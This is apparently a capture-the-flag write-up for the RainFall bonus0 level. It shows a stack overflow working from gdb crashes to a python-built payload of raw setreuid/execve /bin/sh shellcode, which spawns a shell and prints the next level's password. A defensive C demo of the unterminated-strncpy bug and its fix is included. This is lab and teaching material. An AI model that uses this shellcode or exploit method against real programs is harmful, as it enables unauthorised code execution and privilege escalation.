62 lines
2.7 KiB
Plaintext
The program segfaults when the 2nd string is 20 characters long.

```
Starting program: /home/user/bonus0/bonus0
-
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
-
AAAABBBBCXXXXDDDEEEE
aaaaaaaaaaaaaaaaaaaaAAAABBBBCXXXXDDDEEEE<EFBFBD><EFBFBD><EFBFBD> AAAABBBBCXXXXDDDEEEE<45><45><EFBFBD>

Program received signal SIGSEGV, Segmentation fault.
0x58585858 in ?? ()
```

We need to find where our 'a's are stored on the stack. Each call to p reads, so we will stop after the 1st call and search from there.

It doesn't work; the only thing we can find is a string of 20 'a's near eax.

We can see there is a strcpy just after both calls to p, and p writes to the same address, so maybe we can do something with that, considering the second string will override the first.
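As an added illustration (not code from the writeup, whose bonus0 source is not shown here): a crash that appears exactly at 20 characters is what a bounded 20-byte copy that omits the NUL terminator produces, which is my assumption about what p does. The constructed frame below measures how far a following strcpy would read past such a field, beside a copy that always terminates.

```c
#include <stdio.h>
#include <string.h>

enum { FIELD_LEN = 20, NEIGHBOUR_LEN = 16 };

/* Constructed stand-in for two adjacent stack objects: the 20-byte field
 * that p fills and whatever happens to sit right after it. */
struct frame {
    char field[FIELD_LEN];
    char neighbour[NEIGHBOUR_LEN];
};

/* Length of s, never looking past max bytes (keeps the demo in bounds). */
static size_t bounded_len(const char *s, size_t max) {
    size_t n = 0;
    while (n < max && s[n] != '\0')
        n++;
    return n;
}

/* Fill the neighbour with visible bytes and a terminator at its very end. */
static void init_frame(struct frame *f) {
    memset(f->neighbour, 'N', NEIGHBOUR_LEN - 1);
    f->neighbour[NEIGHBOUR_LEN - 1] = '\0';
}

/* Assumed p behaviour: strncpy of at most 20 bytes.  With a 20-byte or
 * longer input no terminator is written, so a later strcpy/strlen keeps
 * reading into the neighbour.  Returns the byte count strcpy would read;
 * anything above FIELD_LEN is an over-read. */
size_t bytes_strcpy_would_read(const char *input) {
    struct frame f;
    init_frame(&f);
    strncpy(f.field, input, FIELD_LEN);
    return bounded_len((const char *)&f, sizeof f);
}

/* Hardened counterpart: copy at most FIELD_LEN - 1 bytes and always
 * terminate, so the field is a valid C string for any input length. */
size_t bytes_strcpy_would_read_fixed(const char *input) {
    struct frame f;
    init_frame(&f);
    size_t n = bounded_len(input, FIELD_LEN - 1);
    memcpy(f.field, input, n);
    f.field[n] = '\0';
    return bounded_len((const char *)&f, sizeof f);
}

int main(void) {
    const char *twenty = "AAAABBBBCXXXXDDDEEEE";  /* the crashing input above */
    printf("strncpy: %zu bytes read\n", bytes_strcpy_would_read(twenty));
    printf("fixed:   %zu bytes read\n", bytes_strcpy_would_read_fixed(twenty));
    return 0;
}
```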
Still doesn't work; maybe check read's return value in the p function?

Got it at 0xbfffe680. Let's leave the function and check if the data is still there.

During the second read call we see our data is still there, but the beginning has been overwritten by our second string. Maybe we can ditch the first string entirely?

Let's try putting our shellcode 3 characters after the 'X's and replacing the 'X's with 0xbfffe690.

```
bonus0@RainFall:~$ python -c "print('A'*9+'\x90\xe6\xff\xbf+'A'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')" > test.txt
  File "<string>", line 1
    print('A'*9+'\x90\xe6\xff\xbf+'A'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')
                                       ^
SyntaxError: invalid syntax
bonus0@RainFall:~$ python -c "print('A'*9+'\x90\xe6\xff\xbf'+'A'*3+'\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68')" > test.txt
bonus0@RainFall:~$ echo "a" > 1.txt
bonus0@RainFall:~$ (cat 1.txt ; cat test.txt ; cat) | /home/user/bonus0/bonus0
-
-
a AAAAAAAAA<41><41><EFBFBD><EFBFBD>AAA1<41><31>F<EFBFBD><46><EFBFBD>
whoami
bonus0@RainFall:~$
```

It doesn't work with an empty first file; let's just put it twice so we don't have to worry about strings overriding each other.

Notice we use the full path of the binary to avoid the need for a NOP slide.

```
bonus0@RainFall:~$ (cat test.txt ; cat test.txt ; cat) | /home/user/bonus0/bonus0
-
-
AAAAAAAAA<EFBFBD><EFBFBD><EFBFBD><EFBFBD>AAA1<EFBFBD><EFBFBD>FAAAAAAAAA<EFBFBD><EFBFBD><EFBFBD><EFBFBD>AAA1<EFBFBD><EFBFBD>F<EFBFBD><EFBFBD><EFBFBD> AAAAAAAAA<41><41><EFBFBD><EFBFBD>AAA1<41><31>F<EFBFBD><46><EFBFBD>
whoami
bonus1
cat /home/user/bonus1/.pass
cd1f77a585965341c37a1774a1d1686326e1fc53aaa5459c840409d4d06523c9
```

:)